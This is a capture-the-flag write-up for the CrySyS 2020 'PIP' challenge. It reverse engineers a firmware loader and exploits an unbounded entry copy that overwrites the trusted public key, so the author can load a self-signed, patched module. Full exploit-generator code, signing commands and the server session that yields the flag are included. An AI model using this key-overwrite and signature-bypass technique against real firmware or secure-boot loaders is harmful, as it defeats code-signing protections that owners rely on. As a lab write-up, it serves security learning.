Reverse engineering, Windows internals, x86 magic, low level programming, and everything else I feel like writing about.

CrySyS SecChallenge 2020: PIP

This one is not for the feint of heart. Maybe you want to look at this once you are done with everything else. Good luck!

This challenge had an environment accessible over raw TCP. You can simulate running the payload with ./pip payload.bin

Categories

Offensive, Linux, Reverse Engineering

Files

Solution

I advise you to watch the linked talk earlier. Not only it is the solution to this challenge, but also an interesting talk. The thing we want to exploit here is the very same as in the linked talk. We start off by checking main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  if ( argc == 1 )
  {
    if ( receiveFw() )
      readfw("./pipfw.bin");
  }
  else
  {
    readfw(argv[1]);
  }
  return 0;
}

Pretty helpful, this lets us easily test locally. Let’s check what readfw does:

void __cdecl readfw(const char *fwPath)
{
  int fwSize; // [rsp+1Ch] [rbp-74h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> >::iterator __for_begin; // [rsp+20h] [rbp-70h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> >::iterator __for_end; // [rsp+28h] [rbp-68h]
  char *buf; // [rsp+30h] [rbp-60h]
  const pip::FwHeader *fw; // [rsp+38h] [rbp-58h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> > *__for_range; // [rsp+40h] [rbp-50h]
  pthread_t *thread; // [rsp+48h] [rbp-48h]
  flatbuffers::Verifier verifier; // [rsp+50h] [rbp-40h]
  unsigned __int64 v9; // [rsp+88h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  fwSize = 0;
  buf = readf(fwPath, &fwSize);
  if ( buf )
  {
    flatbuffers::Verifier::Verifier(&verifier, (const uint8_t *)buf, fwSize, 0x40u, 0xF4240u, 1);
    if ( !pip::VerifyFwHeaderBuffer(&verifier) )
    {
      puts("[+PIP] Firmware seems malformed, halting execution.");
    }
    else
    {
      fw = pip::GetFwHeader(buf);
      if ( loadpub(fw) )
      {
        puts("[+PIP] Loading boot loader..");
        if ( mapModules(fw, DirectoryEntryType_PIP_FW_BOOT_LOADER) )
        {
          puts("[+PIP] Loading BIOS..");
          if ( !mapModules(fw, DirectoryEntryType_PIP_FW_BIOS) )
            puts("[+PIP] Seems like the developers were too lazy to implement the BIOS..");
        }
        puts("[+PIP] Done reading firmware, waiting for module threads");
        __for_range = &moduleThreads;
        __for_begin._M_current = std::vector<unsigned long *,std::allocator<unsigned long *>>::begin(&moduleThreads)._M_current;
        __for_end._M_current = std::vector<unsigned long *,std::allocator<unsigned long *>>::end(__for_range)._M_current;
        while ( __gnu_cxx::operator!=<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>(
                  &__for_begin,
                  &__for_end) )
        {
          thread = *__gnu_cxx::__normal_iterator<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>::operator*(&__for_begin);
          pthread_join(*thread, 0LL);
          __gnu_cxx::__normal_iterator<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>::operator++(&__for_begin);
        }
      }
      else
      {
        puts("Failed to load unknown public key, please use the public key provided by the manufacturer.");
      }
      puts("[+PIP] Exiting");
    }
  }
  else
  {
    puts("[+PIP] Missing firmware");
  }
}

Seems like it is a FlatBuffer file. Checking the verify functions we discover the FlatBuffer identifier they use is IPFW. After checking out some of the other functions, we will notice some interesting things going on in loadpub:

bool __cdecl loadpub(const pip::FwHeader *fw)
{
  const pip::Directory *v1; // rax
  const pip::Directory *v2; // rax
  const pip::DirectoryEntry *v3; // rax
  const pip::DirectoryEntry *v4; // rax
  const flatbuffers::Vector<unsigned char> *v5; // rax
  const pip::DirectoryEntry *v6; // rax
  const flatbuffers::Vector<unsigned char> *v7; // rax
  int v8; // eax
  const pip::DirectoryEntry *v9; // rax
  const pip::DirectoryEntry *v10; // rax
  const flatbuffers::Vector<unsigned char> *v11; // rax
  size_t v12; // rbx
  const pip::DirectoryEntry *v13; // rax
  const flatbuffers::Vector<unsigned char> *v14; // rax
  const unsigned __int8 *v15; // rax
  char result; // [rsp+1Bh] [rbp-55h]
  int size1; // [rsp+1Ch] [rbp-54h]
  int entryCounter; // [rsp+20h] [rbp-50h]
  int copySize; // [rsp+24h] [rbp-4Ch]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> it; // [rsp+28h] [rbp-48h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> it2; // [rsp+30h] [rbp-40h]
  const flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> size2; // [rsp+38h] [rbp-38h]
  const unsigned __int8 *fwPub; // [rsp+40h] [rbp-30h]
  uint8_t *publicHash; // [rsp+48h] [rbp-28h]
  char *known; // [rsp+50h] [rbp-20h]
  unsigned __int64 v27; // [rsp+58h] [rbp-18h]

  v27 = __readfsqword(0x28u);
  entryCounter = 0;
  result = 0;
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&it);
  while ( 1 )
  {
    pip::FwHeader::directories(fw);
    flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&size2);
    if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator<(&it, &size2) )
      return result;
    v1 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
    pip::Directory::entries(v1);
    flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&it2);
    while ( 1 )
    {
      v2 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
      pip::Directory::entries(v2);
      flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&size2);
      if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator<(
              &it2,
              (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *)&size2) )
        break;
      v3 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
      if ( pip::DirectoryEntry::type(v3) == 0 )
      {
        v4 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v5 = pip::DirectoryEntry::entryData(v4);
        fwPub = flatbuffers::Vector<unsigned char>::data(v5);
        v6 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v7 = pip::DirectoryEntry::entryData(v6);
        v8 = flatbuffers::Vector<unsigned char>::size(v7);
        publicHash = calcSha512((uint8_t *)fwPub, v8);
        known = (char *)&unk_8460;
        if ( memcmp(publicHash, &unk_8460, 0x40uLL) )
        {
          puts("[+PIP] Firmware's pubkey is corrupted!");
          result = 0;
          break;
        }
        puts("[+PIP] Found valid pubkey!");
        strcpy(gEmbeddedMemory.pubKey, (const char *)fwPub);
        result = 1;
      }
      v9 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
      if ( pip::DirectoryEntry::type(v9) == 4 )
      {
        size1 = 256;
        v10 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v11 = pip::DirectoryEntry::entryData(v10);
        LODWORD(size2.data_) = flatbuffers::Vector<unsigned char>::size(v11);
        copySize = *std::min<int>(&size1, (const int *)&size2);
        v12 = copySize;
        v13 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v14 = pip::DirectoryEntry::entryData(v13);
        v15 = flatbuffers::Vector<unsigned char>::data(v14);
        memcpy(&gEmbeddedMemory.entries[(__int64)entryCounter++], v15, v12);
      }
      flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator++(
        (flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *const)&size2,
        (unsigned __int64)&it2);
    }
    flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator++(
      (flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *const)&size2,
      (unsigned __int64)&it);
  }
}

There are a few things to notice here:

  • Public keys can be loaded into gEmbeddedMemory.pubKey, but are hash checked, just as with AMD
  • Data of DirectoryEntry of type 4 is copied into the next slot in gEmbeddedMemory.entries, but at most 256 bytes
  • Count of entries is not limited in any way, this is a buffer overflow

So what can we overwrite with this?

00000000 embeddedMemory  struc ; (sizeof=0x800, copyof_794)
00000000                                         ; XREF: .bss:gEmbeddedMemory/r
00000000 entries         RawDirectoryEntry 4 dup(?)
00000400 pubKey          db 1024 dup(?)          ; XREF: lsfw(pip::FwHeader const*)+1F2/o
00000400                                         ; mapModules(pip::FwHeader const*,pip::DirectoryEntryType)+1D1/o ...
00000800 embeddedMemory  ends

Just as with AMD, the public key. With this, we decide we’re going to take the following course:

  1. We add the original public key, as we need to return true to have the rest of the code run.
  2. We add 4 entries with any data, to get to the fifth slot.
  3. We add entries for each 256 bytes of our own public key, overwriting the original public key.

Now we only need to make a firmware and sign it with our own key. Let’s see how firmwares are loaded in mapModules:

bool __cdecl mapModules(const pip::FwHeader *fw, pip::DirectoryEntryType loadType)
{
  const pip::Directory *v2; // rax
  const pip::Directory *v3; // rax
  const pip::DirectoryEntry *v4; // rax
  const pip::DirectoryEntry *v5; // rax
  const pip::DirectoryEntry *v6; // rax
  bool v7; // al
  int signatureSize; // er14
  uint8_t *signature; // r12
  int plainTextSize; // er13
  uint8_t *plainText; // rbx
  const char *const *v12; // rax
  const pip::DirectoryEntry *v13; // rax
  int v14; // er12
  int v15; // ebx
  const unsigned __int8 *v16; // rax
  bool result; // al
  bool validSignature; // [rsp+16h] [rbp-AAh]
  bool isSigned; // [rsp+17h] [rbp-A9h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> it; // [rsp+18h] [rbp-A8h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> it2; // [rsp+20h] [rbp-A0h]
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > v22; // [rsp+28h] [rbp-98h]
  const flatbuffers::Vector<unsigned char> *data; // [rsp+30h] [rbp-90h]
  const flatbuffers::Vector<unsigned char> *sign; // [rsp+38h] [rbp-88h]
  uint64_t decompressedSize; // [rsp+40h] [rbp-80h]
  uint8_t *inflated; // [rsp+48h] [rbp-78h]
  std::string lpub; // [rsp+50h] [rbp-70h]
  std::string p_publicKey; // [rsp+70h] [rbp-50h]
  unsigned __int64 v29; // [rsp+98h] [rbp-28h]

  v29 = __readfsqword(0x28u);
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&it);
LABEL_2:
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::end(&v22);
  if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator<(
          &it,
          (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *)&v22) )
    return 0;
  v2 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
  pip::Directory::entries(v2);
  flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&it2);
  while ( 1 )
  {
    v3 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
    pip::Directory::entries(v3);
    flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&v22);
    if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator<(
            &it2,
            (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *)&v22) )
    {
      flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator++(
        (flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *const)&v22,
        (unsigned __int64)&it);
      goto LABEL_2;
    }
    v4 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
    if ( loadType == pip::DirectoryEntry::type(v4) )
      break;
    flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator++(
      (flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *const)&v22,
      (unsigned __int64)&it2);
  }
  v5 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
  data = pip::DirectoryEntry::entryData(v5);
  v6 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
  sign = pip::DirectoryEntry::signature(v6);
  v7 = sign && flatbuffers::Vector<unsigned char>::size(sign);
  isSigned = v7;
  validSignature = 0;
  if ( v7 )
  {
    std::allocator<char>::allocator(&v22);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<std::allocator<char>>(
      &lpub,
      gEmbeddedMemory.pubKey,
      (const std::allocator<char> *)&v22);
    std::allocator<char>::~allocator(&v22);
    signatureSize = flatbuffers::Vector<unsigned char>::size(sign);
    signature = (uint8_t *)flatbuffers::Vector<unsigned char>::data(sign);
    plainTextSize = flatbuffers::Vector<unsigned char>::size(data);
    plainText = (uint8_t *)flatbuffers::Vector<unsigned char>::data(data);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&p_publicKey, &lpub);
    validSignature = verifySignatureData(&p_publicKey, plainText, plainTextSize, signature, signatureSize);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&p_publicKey);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&lpub);
  }
  if ( isSigned && validSignature )
  {
    v12 = pip::EnumNamesDirectoryEntryType();
    printf("[+PIP] Found module %s with valid signature, loading..\n", v12[loadType]);
    v13 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
    decompressedSize = pip::DirectoryEntry::decompressedSize(v13);
    inflated = (uint8_t *)malloc(decompressedSize);
    v14 = decompressedSize;
    v15 = flatbuffers::Vector<unsigned char>::size(data);
    v16 = flatbuffers::Vector<unsigned char>::data(data);
    inflate(v16, v15, inflated, v14);
    dlblob(inflated, decompressedSize);
    result = 1;
  }
  else
  {
    puts("[+PIP] Found module but signature is invalid.");
    result = 0;
  }
  return result;
}

Checking dlblob shows it just loads a module from memory and calls its _Z4loadv export:

void __cdecl dlblob(const void *blob, size_t len)
{
  unsigned int v2; // eax
  unsigned int shm_fd; // [rsp+14h] [rbp-42Ch]
  pthread_t *loaderThread; // [rsp+18h] [rbp-428h]
  void *handle; // [rsp+20h] [rbp-420h]
  void *loadea; // [rsp+28h] [rbp-418h]
  char path[1024]; // [rsp+30h] [rbp-410h]
  unsigned __int64 v8; // [rsp+438h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  shm_fd = memfd_create("pip", 1u);
  write(shm_fd, blob, len);
  v2 = getpid();
  snprintf(path, 0x400uLL, "/proc/%d/fd/%d", v2, shm_fd);
  handle = dlopen(path, 1);
  loadea = dlsym(handle, "_Z4loadv");
  if ( loadea )
  {
    loaderThread = (pthread_t *)malloc(8uLL);
    pthread_create(loaderThread, 0LL, (void *(*)(void *))startModule, loadea);
    std::vector<unsigned long *,std::allocator<unsigned long *>>::push_back(&moduleThreads, &loaderThread);
  }
  else
  {
    puts("[+PIP] Unable to find module entry point.");
  }
}

As you can see mapModules just searches for the first directory entry of type loadType, gets it’s data and signature, then verifies it. If it passes, it inflates the data and loads the resulting module. At this point I fired up gdb, placed a breakpoint at dlblob and ran ./pip pipfw_oem.bin, then proceeded to dump the original module from memory. Opening it up in IDA shows it’s pretty simple:

__int64 load(void)
{
  puts("[Loader] Hello world - from the Platform Insecurity Processor.");
  flag = (char *)readf("flag.txt", 0LL);
  puts("[Loader] Unfortunately the manufacturer has disabled printing the flag, sorry.");
  while ( noPrint )
    ;
  puts(flag);
  return 0LL;
}

Checking noPrint shows it’s set as constant 1:

.data:0000000000004068 _ZL7noPrint     db 1

Simply patch it to 0 and export the resulting patched firmware to pipfw_patched.bin. We will deflate it, sign this with our key, and add as an entry of type 1 to our new firmware image. I made a signing key really quick for usage later (outputs omitted):

user@ubuntu:~$ openssl genrsa -des3 -out private.pem 4096
user@ubuntu:~$ openssl rsa -in private.pem -outform PEM -pubout -out public.pem
user@ubuntu:~$ openssl rsa -in private.pem -outform PEM -out private_nopass.pem

Now we only need the format of the file. We already know it’s FlatBuffer, so we only need to find out the schema used. Fortunately searching for pip:: functions will show us all the offsets and therefore the orders of the entires in the schema. Based on this I came up with the following schema:

table DirectoryEntry {
  type:ubyte;
  isCompressed:bool;
  decompressedSize:ulong;
  entryData:[ubyte];
  signature:[ubyte];
}

table Directory {
  entries:[DirectoryEntry];
}

table Head {
  fwVerMajor:short;
  fwVerMinor:short;
  fwVerSubminor:short;
  unknown:short;
  directories:[Directory];
}

root_type Head;

Let’s try dumping the original firmware to see if our code works:

int main()
{
  size_t sz;
  const auto data = getfile("pipfw_oem.bin", sz);
  const auto head = GetHead(data);
  printf(
    "%hd.%hd.%hd unknown: %04hX\n",
    head->fwVerMajor(),
    head->fwVerMinor(),
    head->fwVerSubminor(),
    head->unknown()
  );
  const auto dirs = head->directories();
  for (const auto& dir : *dirs)
  {
    for (const auto& dir_entry : *dir->entries())
    {
      printf(
        "type %02X compressed %d, decompressed %016llX\n",
        dir_entry->type(),
        (int)dir_entry->isCompressed(),
        dir_entry->decompressedSize()
      );
    }
  }
}

Output:

0.0.1337 unknown: 4741
type 00 compressed 0, decompressed 0000000000000000
type 01 compressed 1, decompressed 0000000000003FE8

All we need to do at this point is just making a program for generating the new firmware image:

int main()
{
  size_t fw_decompressed_sz;
  const auto fw_decompressed = getfile("pipfw_patched.bin", fw_decompressed_sz);
  const auto compressor = libdeflate_alloc_compressor(9);
  auto fw = malloc(fw_decompressed_sz << 1);
  size_t fw_sz = libdeflate_zlib_compress(
    compressor,
    fw_decompressed,
    fw_decompressed_sz,
    fw,
    fw_decompressed_sz << 1
  );
  libdeflate_free_compressor(compressor);
  putfile("pipfw_patched_deflated.bin", fw, fw_sz);
  system("openssl dgst -sha256 -sign private_nopass.pem -out signature.sha256 pipfw_patched_deflated.bin");
  size_t fw_sig_sz;
  const auto fw_sig = getfile("signature.sha256", fw_sig_sz);
  size_t pub_sz;
  const auto pub = getfile("public.pem", pub_sz);
  size_t original_sz;
  const auto original = getfile("pipfw_oem.bin", original_sz);
  const auto head = GetHead(original);
  const DirectoryEntry* sig_entry = nullptr;
  for (const auto& dir : *head->directories())
    for (const auto& dir_entry : *dir->entries())
      if (dir_entry->type() == 0)
        sig_entry = dir_entry;
  assert(sig_entry);

  flatbuffers::FlatBufferBuilder fbb;
  std::uint8_t junk[256]{};
  std::vector<flatbuffers::Offset<DirectoryEntry>> entries;
  // Add original signature
  entries.push_back(
    CreateDirectoryEntry(
      fbb,
      0,
      false,
      0,
      fbb.CreateVector(
        sig_entry->entryData()->data(),
        sig_entry->entryData()->size()
      )
    )
  );

  // Add 1024 bytes of nothing
  for (auto i = 0u; i < 4; ++i)
    entries.push_back(
      CreateDirectoryEntry(
        fbb,
        4,
        false,
        0,
        fbb.CreateVector(
          junk,
          std::size(junk)
        )
      )
    );

  // Add our pubkey, split into 256 byte chunks
  for (auto i = 0u; i < pub_sz; i += 256)
    entries.push_back(
      CreateDirectoryEntry(
        fbb,
        4,
        false,
        0,
        fbb.CreateVector(
          (uint8_t*)pub + i,
          pub_sz - i
        )
      )
    );

  // Add our patched firmware and the signature for it
  entries.push_back(
    CreateDirectoryEntry(
      fbb,
      1,
      true,
      fw_decompressed_sz,
      fbb.CreateVector(
        (uint8_t*)fw,
        fw_sz
      ),
      fbb.CreateVector(
        (uint8_t*)fw_sig,
        fw_sig_sz
      )
    )
  );

  const auto new_head = CreateHead(
    fbb,
    head->fwVerMajor(),
    head->fwVerMinor(),
    head->fwVerSubminor(),
    head->unknown(),
    fbb.CreateVector(
      std::vector<flatbuffers::Offset<Directory>>{
        CreateDirectory(
          fbb,
          fbb.CreateVector(
            entries
          )
        )
      }
    )
  );

  fbb.Finish(new_head, "IPFW");
  const auto buf = fbb.GetBufferPointer();
  const auto size = fbb.GetSize();
  putfile("pipfw_cfw.bin", buf, size);
}

After generating the new firmware, we try running it against the server:

root@ubuntu:~# stat --printf="%s\n" pipfw_cfw.bin > answer.txt
root@ubuntu:~# cat answer.txt pipfw_cfw.bin - | nc 1.2.3.4 12345
Please upload platform firmware...
File size: Reading...
[+PIP] Found valid pubkey!
[+PIP] Loading boot loader..
[+PIP] Found module PIP_FW_BOOT_LOADER with valid signature, loading..
[+PIP] Loading BIOS..
[+PIP] Seems like the developers were too lazy to implement the BIOS..
[+PIP] Done reading firmware, waiting for module threads
[Loader] Hello world - from the Platform Insecurity Processor.
[Loader] Unfortunately the manufacturer has disabled printing the flag, sorry.
cd20{AyEmD_1S_N0T_1MPR3SS3D_0WN3R_C0NTR0L_1S_FUTIL3}

[+PIP] Exiting